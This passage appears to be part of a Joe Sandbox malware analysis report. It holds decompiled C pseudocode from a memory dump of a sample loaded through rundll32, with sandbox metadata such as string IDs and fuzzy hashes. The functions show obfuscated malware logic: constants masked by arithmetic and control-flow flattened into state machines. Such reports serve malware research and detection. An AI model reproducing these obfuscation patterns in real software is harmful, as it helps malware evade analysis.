                                                                                                                      				_v72 = _v72 ^ 0x00aeb203;
                                                                                                                      				_v76 = 0xda65d9;
                                                                                                                      				_v76 = _v76 | 0x06c15440;
                                                                                                                      				_v76 = _v76 + 0x3ac0;
                                                                                                                      				_t230 = 0x31;
                                                                                                                      				_v76 = _v76 * 0x17;
                                                                                                                      				_v76 = _v76 ^ 0x9dbea6d5;
                                                                                                                      				_v28 = 0xef7021;
                                                                                                                      				_v28 = _v28 + 0xc1df;
                                                                                                                      				_v28 = _v28 ^ 0x38dac4ec;
                                                                                                                      				_v28 = _v28 ^ 0x38291ca9;
                                                                                                                      				_v56 = 0xd77e5;
                                                                                                                      				_v56 = _v56 | 0x9f6ff94e;
                                                                                                                      				_v56 = _v56 / _t230;
                                                                                                                      				_v56 = _v56 ^ 0x034debba;
                                                                                                                      				_v32 = 0x5c0433;
                                                                                                                      				_t231 = 0x4c;
                                                                                                                      				_v32 = _v32 / _t231;
                                                                                                                      				_t232 = 0x38;
                                                                                                                      				_v32 = _v32 * 9;
                                                                                                                      				_v32 = _v32 ^ 0x000ec3b0;
                                                                                                                      				_v60 = 0x6ca766;
                                                                                                                      				_v60 = _v60 + 0x1f13;
                                                                                                                      				_v60 = _v60 * 0x1b;
                                                                                                                      				_v60 = _v60 << 0xb;
                                                                                                                      				_v60 = _v60 ^ 0xc778512f;
                                                                                                                      				_v12 = 0x6aa94;
                                                                                                                      				_v12 = _v12 + 0x5212;
                                                                                                                      				_v12 = _v12 ^ 0x000734b5;
                                                                                                                      				_v48 = 0xd6268c;
                                                                                                                      				_v48 = _v48 / _t232;
                                                                                                                      				_t233 = 0x26;
                                                                                                                      				_v48 = _v48 / _t233;
                                                                                                                      				_v48 = _v48 + 0x646;
                                                                                                                      				_v48 = _v48 ^ 0x000e3e3b;
                                                                                                                      				_v52 = 0x57df31;
                                                                                                                      				_t234 = 0x5e;
                                                                                                                      				_v52 = _v52 / _t234;
                                                                                                                      				_v52 = _v52 >> 4;
                                                                                                                      				_v52 = _v52 << 0x10;
                                                                                                                      				_v52 = _v52 ^ 0x0ef79a5c;
                                                                                                                      				_v8 = 0x5569b0;
                                                                                                                      				_v8 = _v8 >> 0xd;
                                                                                                                      				_v8 = _v8 ^ 0x000ef288;
                                                                                                                      				_v44 = 0x5fa9ce;
                                                                                                                      				_v44 = _v44 + 0xffff7bdd;
                                                                                                                      				_v44 = _v44 << 1;
                                                                                                                      				_t235 = 0x65;
                                                                                                                      				_v44 = _v44 / _t235;
                                                                                                                      				_v44 = _v44 ^ 0x000c777c;
                                                                                                                      				_v36 = 0x515ebf;
                                                                                                                      				_v36 = _v36 | 0x64797e59;
                                                                                                                      				_v36 = _v36 ^ 0x4915d5d4;
                                                                                                                      				_v36 = _v36 ^ 0x2d62d183;
                                                                                                                      				_v16 = 0xf90c33;
                                                                                                                      				_v16 = _v16 * 0x1d;
                                                                                                                      				_v16 = _v16 ^ 0x1c3bb4ce;
                                                                                                                      				_v80 = 0x303e6a;
                                                                                                                      				_v80 = _v80 + 0xaf21;
                                                                                                                      				_v80 = _v80 ^ 0x45872c25;
                                                                                                                      				_v80 = _v80 + 0xffff3867;
                                                                                                                      				_v80 = _v80 ^ 0x45bdee21;
                                                                                                                      				_v20 = 0xb8b4ba;
                                                                                                                      				_v20 = _v20 + 0x3a99;
                                                                                                                      				_v20 = _v20 ^ 0x00b083c3;
                                                                                                                      				_v40 = 0xb582c8;
                                                                                                                      				_v40 = _v40 + 0x432d;
                                                                                                                      				_v40 = _v40 | 0xfff7ef9a;
                                                                                                                      				_v40 = _v40 ^ 0xfff9a351;
                                                                                                                      				_v24 = 0x3e85d;
                                                                                                                      				_v24 = _v24 * 0x1b;
                                                                                                                      				_v24 = _v24 + 0xffffd227;
                                                                                                                      				_v24 = _v24 ^ 0x006c1bcc;
                                                                                                                      				_v4 = 0x28c504;
                                                                                                                      				_v4 = _v4 + 0xffffee75;
                                                                                                                      				_v4 = _v4 ^ 0x002a9648;
                                                                                                                      				do {
                                                                                                                      					while(_t262 != 0x8d90b87) {
                                                                                                                      						if(_t262 == 0x991fac7) {
                                                                                                                      							return E0081EC8A(_v40, _v24, _v4,  *(_t261 + 0x30));
                                                                                                                      						}
                                                                                                                      						if(_t262 == 0xa3f1429) {
                                                                                                                      							_push(_t235);
                                                                                                                      							_t224 = E00828171(_v64, _v68, __eflags, _v72, _v76, _t227);
                                                                                                                      							_t265 =  &(_t264[4]);
                                                                                                                      							 *(_t261 + 0x30) = _t224;
                                                                                                                      							__eflags = _t224;
                                                                                                                      							if(_t224 != 0) {
                                                                                                                      								E0081E205(_v56, _v32, _v60, _t224, _t224);
                                                                                                                      								_t235 =  *(_t261 + 0x30);
                                                                                                                      								E0082DB13(_t235, _v12, _v48, _v52);
                                                                                                                      								_t264 =  &(_t265[6]);
                                                                                                                      								_t262 = 0x8d90b87;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t262 == 0xd46e588) {
                                                                                                                      								_t262 = 0xa3f1429;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t262 != 0xf9322b8) {
                                                                                                                      									goto L14;
                                                                                                                      								} else {
                                                                                                                      									_t235 = 0x10002f34;
                                                                                                                      									_t224 = E008242FF(0x10002f34, _v36, 0x10002f34, 0x10002f34, _v16, _v80, 0x10002f34, _v20, _t261);
                                                                                                                      									_t264 =  &(_t264[8]);
                                                                                                                      									 *(_t261 + 0x24) = _t224;
                                                                                                                      									if(_t224 == 0) {
                                                                                                                      										_t262 = 0x991fac7;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						return _t224;
                                                                                                                      						L18:
                                                                                                                      					}
                                                                                                                      					_t235 = _v8;
                                                                                                                      					_t222 = E00821FDE(_t235,  *(_t261 + 0x30), _v44);
                                                                                                                      					_t264 =  &(_t264[1]);
                                                                                                                      					 *(_t261 + 0xc) = _t222;
                                                                                                                      					__eflags = _t222;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t262 = 0x991fac7;
                                                                                                                      						goto L14;
                                                                                                                      					} else {
                                                                                                                      						_t262 = 0xf9322b8;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      					L14:
                                                                                                                      					__eflags = _t262 - 0x74fce14;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t224;
                                                                                                                      			}





































                                                                                                                      0x008247f6
                                                                                                                      0x008247f6
                                                                                                                      0x00000000
                                                                                                                      0x008247f6
                                                                                                                      0x00000000
                                                                                                                      0x00824802
                                                                                                                      0x00824802
                                                                                                                      0x00824802
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !p$#l</$-C$Y~yd$j>0$w
                                                                                                                      • API String ID: 0-1896768906
                                                                                                                      • Opcode ID: 3a30c4efad81c5cbd4add60a77620eaedfb3d02fbac54a209d8917c006aabcca
                                                                                                                      • Instruction ID: 3061708d5b62e4740e3b0fb1b04814bb50904c91b74d9e54b09c8fba10cdd385
                                                                                                                      • Opcode Fuzzy Hash: 3a30c4efad81c5cbd4add60a77620eaedfb3d02fbac54a209d8917c006aabcca
                                                                                                                      • Instruction Fuzzy Hash: 69A16371908381AFD358CF24D88941BFBF1FBC5358F409A1DF5AA96260E7B589498F83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E0082FC67(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr* _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				char _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				intOrPtr _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				intOrPtr _t261;
                                                                                                                      				intOrPtr* _t266;
                                                                                                                      				intOrPtr _t273;
                                                                                                                      				intOrPtr _t274;
                                                                                                                      				intOrPtr _t275;
                                                                                                                      				intOrPtr _t281;
                                                                                                                      				intOrPtr _t282;
                                                                                                                      				intOrPtr _t283;
                                                                                                                      				signed int _t307;
                                                                                                                      				signed int _t308;
                                                                                                                      				signed int _t309;
                                                                                                                      				signed int _t310;
                                                                                                                      				signed int _t311;
                                                                                                                      				signed int _t312;
                                                                                                                      				signed int _t313;
                                                                                                                      				intOrPtr _t314;
                                                                                                                      				void* _t316;
                                                                                                                      				intOrPtr _t317;
                                                                                                                      				intOrPtr _t318;
                                                                                                                      				intOrPtr _t319;
                                                                                                                      				signed int* _t320;
                                                                                                                      
                                                                                                                      				_t275 = __ecx;
                                                                                                                      				_t320 =  &_v116;
                                                                                                                      				_v12 = __edx;
                                                                                                                      				_v28 = __ecx;
                                                                                                                      				_v8 = 0x8dec59;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v84 = 0xe165d;
                                                                                                                      				_v84 = _v84 << 7;
                                                                                                                      				_v84 = _v84 + 0xc1b7;
                                                                                                                      				_v84 = _v84 ^ 0xc80f2461;
                                                                                                                      				_v84 = _v84 ^ 0xcf04d456;
                                                                                                                      				_v32 = 0x655f30;
                                                                                                                      				_v32 = _v32 + 0x312d;
                                                                                                                      				_v32 = _v32 ^ 0x0065b82f;
                                                                                                                      				_v56 = 0xcafed0;
                                                                                                                      				_v24 = 0;
                                                                                                                      				_t316 = 0x75256fb;
                                                                                                                      				_t307 = 0x74;
                                                                                                                      				_v56 = _v56 / _t307;
                                                                                                                      				_v56 = _v56 | 0x8b781090;
                                                                                                                      				_v56 = _v56 ^ 0x8b7ff779;
                                                                                                                      				_v96 = 0xabe325;
                                                                                                                      				_v96 = _v96 << 0xd;
                                                                                                                      				_v96 = _v96 ^ 0xcbcb3531;
                                                                                                                      				_v96 = _v96 | 0x09a083b5;
                                                                                                                      				_v96 = _v96 ^ 0xbfa5786a;
                                                                                                                      				_v76 = 0x7b9c0a;
                                                                                                                      				_t308 = 0x1c;
                                                                                                                      				_v76 = _v76 / _t308;
                                                                                                                      				_v76 = _v76 + 0xffff76d9;
                                                                                                                      				_v76 = _v76 ^ 0x00066890;
                                                                                                                      				_v80 = 0xfad268;
                                                                                                                      				_v80 = _v80 << 0x10;
                                                                                                                      				_v80 = _v80 ^ 0x68dc041b;
                                                                                                                      				_v80 = _v80 ^ 0xbab50c4e;
                                                                                                                      				_v112 = 0x5717c0;
                                                                                                                      				_v112 = _v112 + 0xd318;
                                                                                                                      				_v112 = _v112 + 0xffff9813;
                                                                                                                      				_v112 = _v112 ^ 0x80b72014;
                                                                                                                      				_v112 = _v112 ^ 0x80e33bd1;
                                                                                                                      				_v116 = 0x9f285d;
                                                                                                                      				_v116 = _v116 >> 9;
                                                                                                                      				_v116 = _v116 + 0xffff6359;
                                                                                                                      				_v116 = _v116 + 0x4b40;
                                                                                                                      				_v116 = _v116 ^ 0xfffb57cb;
                                                                                                                      				_v104 = 0x80a8a2;
                                                                                                                      				_t309 = 0x29;
                                                                                                                      				_v104 = _v104 * 0x2c;
                                                                                                                      				_v104 = _v104 | 0xf3fc02bd;
                                                                                                                      				_v104 = _v104 * 0x46;
                                                                                                                      				_v104 = _v104 ^ 0xcf237eb9;
                                                                                                                      				_v72 = 0x5bfbbd;
                                                                                                                      				_v72 = _v72 | 0xd3d7b19d;
                                                                                                                      				_v72 = _v72 << 0xe;
                                                                                                                      				_v72 = _v72 ^ 0xfee9d95e;
                                                                                                                      				_v108 = 0xd9b2ce;
                                                                                                                      				_v108 = _v108 << 0xf;
                                                                                                                      				_v108 = _v108 + 0xffff979e;
                                                                                                                      				_v108 = _v108 << 2;
                                                                                                                      				_v108 = _v108 ^ 0x6594627e;
                                                                                                                      				_v40 = 0xeed128;
                                                                                                                      				_v40 = _v40 * 0x34;
                                                                                                                      				_v40 = _v40 ^ 0x3088f647;
                                                                                                                      				_v68 = 0x4ae85e;
                                                                                                                      				_v68 = _v68 / _t309;
                                                                                                                      				_t310 = 0x35;
                                                                                                                      				_t319 = _v12;
                                                                                                                      				_v68 = _v68 * 0x53;
                                                                                                                      				_v68 = _v68 ^ 0x009a12ab;
                                                                                                                      				_v60 = 0xe58ccf;
                                                                                                                      				_v60 = _v60 / _t310;
                                                                                                                      				_v60 = _v60 >> 9;
                                                                                                                      				_v60 = _v60 ^ 0x00082ee6;
                                                                                                                      				_v100 = 0x896781;
                                                                                                                      				_v100 = _v100 ^ 0xb532ffdf;
                                                                                                                      				_t311 = 0x3d;
                                                                                                                      				_v100 = _v100 / _t311;
                                                                                                                      				_v100 = _v100 >> 0x10;
                                                                                                                      				_v100 = _v100 ^ 0x0003daf8;
                                                                                                                      				_v64 = 0xd8c0ce;
                                                                                                                      				_v64 = _v64 + 0xffffaca0;
                                                                                                                      				_v64 = _v64 << 0xc;
                                                                                                                      				_v64 = _v64 ^ 0x86dd78e3;
                                                                                                                      				_v36 = 0xf932ba;
                                                                                                                      				_t312 = 0x7f;
                                                                                                                      				_v36 = _v36 * 0x58;
                                                                                                                      				_v36 = _v36 ^ 0x55a76b7b;
                                                                                                                      				_v88 = 0x9f6659;
                                                                                                                      				_v88 = _v88 / _t312;
                                                                                                                      				_v88 = _v88 | 0x1ff6fbbf;
                                                                                                                      				_v88 = _v88 ^ 0xc9c88694;
                                                                                                                      				_v88 = _v88 ^ 0xd6316d06;
                                                                                                                      				_v48 = 0x252418;
                                                                                                                      				_v48 = _v48 ^ 0x008304c1;
                                                                                                                      				_v48 = _v48 + 0xffff4e21;
                                                                                                                      				_v48 = _v48 ^ 0x00a4a0c7;
                                                                                                                      				_v92 = 0xdb5076;
                                                                                                                      				_v92 = _v92 + 0xffff1b85;
                                                                                                                      				_v92 = _v92 | 0x2d9bcef8;
                                                                                                                      				_t313 = 0x68;
                                                                                                                      				_v92 = _v92 / _t313;
                                                                                                                      				_v92 = _v92 ^ 0x0076c4f2;
                                                                                                                      				_v52 = 0x242151;
                                                                                                                      				_v52 = _v52 | 0x94ee4ace;
                                                                                                                      				_v52 = _v52 + 0xf8ef;
                                                                                                                      				_v52 = _v52 ^ 0x94e81f3d;
                                                                                                                      				_t314 = _v4;
                                                                                                                      				_t274 = _v8;
                                                                                                                      				L1:
                                                                                                                      				while(1) {
                                                                                                                      					do {
                                                                                                                      						while(_t316 != 0x1075595) {
                                                                                                                      							if(_t316 == 0x75256fb) {
                                                                                                                      								_t316 = 0x1075595;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t316 != 0xe0f16ec) {
                                                                                                                      									goto L15;
                                                                                                                      								} else {
                                                                                                                      									_t281 = E0081780B(_v76,  &_v20, _v80, _t275, _v112, _t319, _v116, _t261);
                                                                                                                      									_t320 =  &(_t320[6]);
                                                                                                                      									_v24 = _t281;
                                                                                                                      									if(_t281 == 0) {
                                                                                                                      										_t317 = _v24;
                                                                                                                      										L20:
                                                                                                                      										E00815CDE(_v88, _v48, _v92, _v52, _t274);
                                                                                                                      									} else {
                                                                                                                      										_t282 = _v20;
                                                                                                                      										if(_t282 == 0) {
                                                                                                                      											goto L16;
                                                                                                                      										} else {
                                                                                                                      											_v44 = _v44 + _t282;
                                                                                                                      											_t319 = _t319 - _t282;
                                                                                                                      											if(_t319 != 0) {
                                                                                                                      												L9:
                                                                                                                      												_t261 = _v44;
                                                                                                                      												L10:
                                                                                                                      												_t275 = _v28;
                                                                                                                      												_t316 = 0xe0f16ec;
                                                                                                                      												continue;
                                                                                                                      											} else {
                                                                                                                      												_t283 = _t314 + _t314;
                                                                                                                      												_push(_t283);
                                                                                                                      												_push(_t283);
                                                                                                                      												_v16 = _t283;
                                                                                                                      												_t318 = E00822912(_t283);
                                                                                                                      												if(_t318 == 0) {
                                                                                                                      													goto L16;
                                                                                                                      												} else {
                                                                                                                      													E0082F129(_t274, _v40, _t318, _v68, _t314);
                                                                                                                      													E00815CDE(_v60, _v100, _v64, _v36, _t274);
                                                                                                                      													_t319 = _t314;
                                                                                                                      													_t273 = _t318 + _t314;
                                                                                                                      													_t314 = _v16;
                                                                                                                      													_t320 =  &(_t320[6]);
                                                                                                                      													_v44 = _t273;
                                                                                                                      													_t274 = _t318;
                                                                                                                      													if(_t319 == 0) {
                                                                                                                      														goto L16;
                                                                                                                      													} else {
                                                                                                                      														goto L9;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L18:
                                                                                                                      							return _t317;
                                                                                                                      						}
                                                                                                                      						_t314 = 0x10000;
                                                                                                                      						_push(_t275);
                                                                                                                      						_push(_t275);
                                                                                                                      						_t261 = E00822912(0x10000);
                                                                                                                      						_t274 = _t261;
                                                                                                                      						if(_t274 == 0) {
                                                                                                                      							_t275 = _v28;
                                                                                                                      							_t316 = 0x6559491;
                                                                                                                      							goto L15;
                                                                                                                      						} else {
                                                                                                                      							_v44 = _t261;
                                                                                                                      							_t319 = 0x10000;
                                                                                                                      							goto L10;
                                                                                                                      						}
                                                                                                                      						goto L18;
                                                                                                                      						L15:
                                                                                                                      						_t261 = _v44;
                                                                                                                      					} while (_t316 != 0x6559491);
                                                                                                                      					L16:
                                                                                                                      					_t317 = _v24;
                                                                                                                      					if(_t317 == 0) {
                                                                                                                      						goto L20;
                                                                                                                      					} else {
                                                                                                                      						_t266 = _v12;
                                                                                                                      						 *_t266 = _t274;
                                                                                                                      						 *((intOrPtr*)(_t266 + 4)) = _t314 - _t319;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      				}
                                                                                                                      			}





















































                                                                                                                      0x008300b5
                                                                                                                      0x008300b5
                                                                                                                      0x008300bb
                                                                                                                      0x00000000
                                                                                                                      0x008300bd
                                                                                                                      0x008300bd
                                                                                                                      0x008300c3
                                                                                                                      0x008300c5
                                                                                                                      0x008300c5
                                                                                                                      0x00000000
                                                                                                                      0x008300bb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -1$0_e$@K$Q!$$^J
                                                                                                                      • API String ID: 0-785566946
                                                                                                                      • Opcode ID: 41ea18c928f5bc6e050d69f8087d6909cd5aff65254f797b7e67a5a6cbd5e357
                                                                                                                      • Instruction ID: cd589747d6493179249261a91f8ffa101b6c187a0f0c77b19dbc59e7b6f07599
                                                                                                                      • Opcode Fuzzy Hash: 41ea18c928f5bc6e050d69f8087d6909cd5aff65254f797b7e67a5a6cbd5e357
                                                                                                                      • Instruction Fuzzy Hash: 44C11EB15083819FC358DF69C48990BFBE1FBC5798F50892DF5A596220D3B1D949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00824A1F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				char _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				unsigned int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				void* _t181;
                                                                                                                      				signed int _t191;
                                                                                                                      				void* _t203;
                                                                                                                      				signed int _t204;
                                                                                                                      				signed int _t205;
                                                                                                                      				void* _t208;
                                                                                                                      				signed int _t218;
                                                                                                                      				intOrPtr* _t219;
                                                                                                                      				void* _t220;
                                                                                                                      				signed int* _t223;
                                                                                                                      
                                                                                                                      				_t219 = _a8;
                                                                                                                      				_push(_t219);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0081C325(_t181);
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_t223 =  &(( &_v92)[4]);
                                                                                                                      				_v12 = 0x6615d4;
                                                                                                                      				_v8 = 0x63ffda;
                                                                                                                      				_t220 = 0;
                                                                                                                      				_v28 = 0xf9afd3;
                                                                                                                      				_t208 = 0x31efc18;
                                                                                                                      				_v28 = _v28 >> 7;
                                                                                                                      				_v28 = _v28 ^ 0x0001f35e;
                                                                                                                      				_v80 = 0xd84a57;
                                                                                                                      				_v80 = _v80 << 3;
                                                                                                                      				_t204 = 0x18;
                                                                                                                      				_v80 = _v80 * 0x2a;
                                                                                                                      				_v80 = _v80 + 0x45cf;
                                                                                                                      				_v80 = _v80 ^ 0x1be1d7fe;
                                                                                                                      				_v84 = 0xce5c8a;
                                                                                                                      				_v84 = _v84 + 0xa551;
                                                                                                                      				_v84 = _v84 * 0x57;
                                                                                                                      				_v84 = _v84 | 0xfd3f873a;
                                                                                                                      				_v84 = _v84 ^ 0xff78090e;
                                                                                                                      				_v52 = 0xb08f91;
                                                                                                                      				_v52 = _v52 >> 0xc;
                                                                                                                      				_v52 = _v52 + 0xb2fa;
                                                                                                                      				_v52 = _v52 ^ 0x000b6173;
                                                                                                                      				_v56 = 0x674ce5;
                                                                                                                      				_v56 = _v56 + 0x398f;
                                                                                                                      				_v56 = _v56 >> 0x10;
                                                                                                                      				_v56 = _v56 ^ 0x0001bfbd;
                                                                                                                      				_v88 = 0x67105a;
                                                                                                                      				_v88 = _v88 * 0x51;
                                                                                                                      				_v88 = _v88 ^ 0xbb721b0a;
                                                                                                                      				_v88 = _v88 ^ 0x493680b5;
                                                                                                                      				_v88 = _v88 ^ 0xd2dd6d54;
                                                                                                                      				_v60 = 0x6eef31;
                                                                                                                      				_v60 = _v60 << 6;
                                                                                                                      				_v60 = _v60 | 0x99e12062;
                                                                                                                      				_v60 = _v60 ^ 0x9bf73816;
                                                                                                                      				_v92 = 0x911a2f;
                                                                                                                      				_v92 = _v92 ^ 0xd10c2d91;
                                                                                                                      				_v92 = _v92 * 0x5e;
                                                                                                                      				_v92 = _v92 << 7;
                                                                                                                      				_v92 = _v92 ^ 0xdd366504;
                                                                                                                      				_v64 = 0x3fcb13;
                                                                                                                      				_v64 = _v64 >> 0xf;
                                                                                                                      				_v64 = _v64 * 6;
                                                                                                                      				_v64 = _v64 ^ 0x00005971;
                                                                                                                      				_v44 = 0xc7907a;
                                                                                                                      				_v44 = _v44 << 0xb;
                                                                                                                      				_v44 = _v44 >> 0xb;
                                                                                                                      				_v44 = _v44 ^ 0x000cecb3;
                                                                                                                      				_v24 = 0x5cb13a;
                                                                                                                      				_v24 = _v24 | 0x9101a275;
                                                                                                                      				_v24 = _v24 ^ 0x91595ccd;
                                                                                                                      				_v48 = 0x23abf4;
                                                                                                                      				_v48 = _v48 / _t204;
                                                                                                                      				_v48 = _v48 << 2;
                                                                                                                      				_v48 = _v48 ^ 0x0009bb3e;
                                                                                                                      				_v68 = 0x8d9eb5;
                                                                                                                      				_v68 = _v68 >> 0x10;
                                                                                                                      				_v68 = _v68 + 0xf044;
                                                                                                                      				_v68 = _v68 >> 0xe;
                                                                                                                      				_v68 = _v68 ^ 0x000dd2f9;
                                                                                                                      				_v20 = 0x3507ed;
                                                                                                                      				_v20 = _v20 + 0xe3ac;
                                                                                                                      				_v20 = _v20 ^ 0x00302855;
                                                                                                                      				_v32 = 0xacaccb;
                                                                                                                      				_v32 = _v32 ^ 0xc0e60235;
                                                                                                                      				_t205 = 0x4e;
                                                                                                                      				_v32 = _v32 * 0x53;
                                                                                                                      				_v32 = _v32 ^ 0x583b0f23;
                                                                                                                      				_v36 = 0x7d6507;
                                                                                                                      				_v36 = _v36 + 0xffff02b5;
                                                                                                                      				_t191 = _v36;
                                                                                                                      				_t218 = _t191 % _t205;
                                                                                                                      				_v36 = _t191 / _t205;
                                                                                                                      				_v36 = _v36 ^ 0x0005008b;
                                                                                                                      				_v40 = 0xd19b6c;
                                                                                                                      				_v40 = _v40 | 0xa0bb2537;
                                                                                                                      				_v40 = _v40 + 0xffff1d7c;
                                                                                                                      				_v40 = _v40 ^ 0xa0fa32c2;
                                                                                                                      				_v72 = 0xc60854;
                                                                                                                      				_v72 = _v72 | 0x85b2e473;
                                                                                                                      				_v72 = _v72 + 0x7f84;
                                                                                                                      				_v72 = _v72 * 0x36;
                                                                                                                      				_v72 = _v72 ^ 0x423e0813;
                                                                                                                      				_v76 = 0xd43520;
                                                                                                                      				_v76 = _v76 + 0x4339;
                                                                                                                      				_v76 = _v76 + 0xffffe1a4;
                                                                                                                      				_v76 = _v76 >> 0xd;
                                                                                                                      				_v76 = _v76 ^ 0x000c8c56;
                                                                                                                      				do {
                                                                                                                      					while(_t208 != 0x2557e54) {
                                                                                                                      						if(_t208 == 0x31efc18) {
                                                                                                                      							_t208 = 0xe841cef;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t208 == 0xa700901) {
                                                                                                                      								E0081A667(_a4, _t218, _v68,  &_v16, _v20, _t208, _v32, _t220, _v36, _v40, _t208, _v72, _v76, _v80);
                                                                                                                      								 *_t219 = _v16;
                                                                                                                      							} else {
                                                                                                                      								if(_t208 != 0xe841cef) {
                                                                                                                      									goto L11;
                                                                                                                      								} else {
                                                                                                                      									_t203 = E0081A667(_a4, _t218, _v84,  &_v16, _v52, _t208, _v56, 0, _v88, _v60, _t208, _v92, _v64, _v28);
                                                                                                                      									_t223 =  &(_t223[0xc]);
                                                                                                                      									if(_t203 != 0) {
                                                                                                                      										_t208 = 0x2557e54;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L14:
                                                                                                                      						return _t220;
                                                                                                                      					}
                                                                                                                      					_push(_t208);
                                                                                                                      					_push(_t208);
                                                                                                                      					_t220 = E00822912(_v16);
                                                                                                                      					if(_t220 == 0) {
                                                                                                                      						_t208 = 0x2fabbe9;
                                                                                                                      						goto L11;
                                                                                                                      					} else {
                                                                                                                      						_t208 = 0xa700901;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L14;
                                                                                                                      					L11:
                                                                                                                      				} while (_t208 != 0x2fabbe9);
                                                                                                                      				goto L14;
                                                                                                                      			}





































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1n$9C$U(0$qY$Lg
                                                                                                                      • API String ID: 0-890920262
                                                                                                                      • Opcode ID: 3dd90d24197c6e0eb425be8a52b4512aac5aa0624a9b5daf25ccf20776c8ba82
                                                                                                                      • Instruction ID: fe70e62104c088d6fcaa5705d5ed9f12b5b6b9ac49bf7771bf351d6970182af8
                                                                                                                      • Opcode Fuzzy Hash: 3dd90d24197c6e0eb425be8a52b4512aac5aa0624a9b5daf25ccf20776c8ba82
                                                                                                                      • Instruction Fuzzy Hash: C2910FB14093819FC358CF65D58A81BFBF1FB94748F105A0DF2A596260D3B68A88CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0082482E(void* __ecx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				unsigned int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				void* _t103;
                                                                                                                      				void* _t104;
                                                                                                                      				void* _t107;
                                                                                                                      				signed int _t109;
                                                                                                                      				signed int _t110;
                                                                                                                      				void* _t119;
                                                                                                                      				void* _t120;
